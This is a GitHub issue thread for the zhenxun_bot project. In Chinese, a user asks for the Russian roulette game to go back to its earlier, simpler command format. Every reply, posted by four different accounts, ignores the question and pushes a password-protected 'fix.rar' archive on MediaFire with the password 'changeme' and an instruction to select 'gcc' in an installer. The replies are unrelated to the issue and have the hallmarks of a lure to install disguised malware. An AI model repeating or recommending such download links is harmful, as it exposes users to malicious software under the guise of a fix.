### ISSUE TITLE
提个小小有关俄罗斯轮盘的建议

### ISSUE THREAD

**Issue by kasdals** [HibiKier/zhenxun_bot#1584]
系统版本：Windows10
真寻版本：0.2.1
俄罗斯轮盘如果可以的话能回到上个版本吗？现在这个需要输入命令 “装弹 200 1 ”版本的俄罗斯轮盘好多群友都说有点不方便。
所以如果可以的话还是请希望按照之前的来好一点，谢谢开发者大大！如果不行的话也没事!

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
